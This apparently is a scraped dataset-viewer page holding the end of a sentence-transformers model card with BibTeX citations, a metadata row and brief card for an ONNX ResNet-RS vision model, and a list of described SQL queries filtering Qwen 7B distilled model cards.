- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
onnxmodelzoo/resnetrs350_Opset17
|
onnxmodelzoo
| 2025-09-23T14:25:06Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:24:35Z |
---
language: en
license: apache-2.0
model_name: resnetrs350_Opset17.onnx
tags:
- Computer_Vision
---
|
Subsets and Splits
Filtered Qwen2.5 Distill Models
Identifies specific configurations of models by filtering cards that contain 'distill', 'qwen2.5', '7b' while excluding certain base models and incorrect model ID patterns, uncovering unique model variants.
Filtered Model Cards Count
Finds the count of entries with specific card details that include 'distill', 'qwen2.5', '7b' but exclude certain base models, revealing valuable insights about the dataset's content distribution.
Filtered Distill Qwen 7B Models
Filters for specific card entries containing 'distill', 'qwen', and '7b', excluding certain strings and patterns, to identify relevant model configurations.
Filtered Qwen-7b Model Cards
The query performs a detailed filtering based on specific keywords and excludes certain entries, which could be useful for identifying a specific subset of cards but does not provide deeper insights or trends.
Filtered Qwen 7B Model Cards
The query filters for specific terms related to "distilled" or "distill", "qwen", and "7b" in the 'card' column but excludes certain base models, providing a limited set of entries for further inspection.
Qwen 7B Distilled Models
The query provides a basic filtering of records to find specific card names that include keywords related to distilled Qwen 7b models, excluding a particular base model, which gives limited insight but helps in focusing on relevant entries.
Qwen 7B Distilled Model Cards
The query filters data based on specific keywords in the modelId and card fields, providing limited insight primarily useful for locating specific entries rather than revealing broad patterns or trends.
Qwen 7B Distilled Models
Finds all entries containing the terms 'distilled', 'qwen', and '7b' in a case-insensitive manner, providing a filtered set of records but without deeper analysis.
Distilled Qwen 7B Models
The query filters for specific model IDs containing 'distilled', 'qwen', and '7b', providing a basic retrieval of relevant entries but without deeper analysis or insight.
Filtered Model Cards with Distill Qwen2.
Filters and retrieves records containing specific keywords in the card description while excluding certain phrases, providing a basic count of relevant entries.
Filtered Model Cards with Distill Qwen 7
The query filters specific variations of card descriptions containing 'distill', 'qwen', and '7b' while excluding a particular base model, providing limited but specific data retrieval.
Distill Qwen 7B Model Cards
The query filters and retrieves rows where the 'card' column contains specific keywords ('distill', 'qwen', and '7b'), providing a basic filter result that can help in identifying specific entries.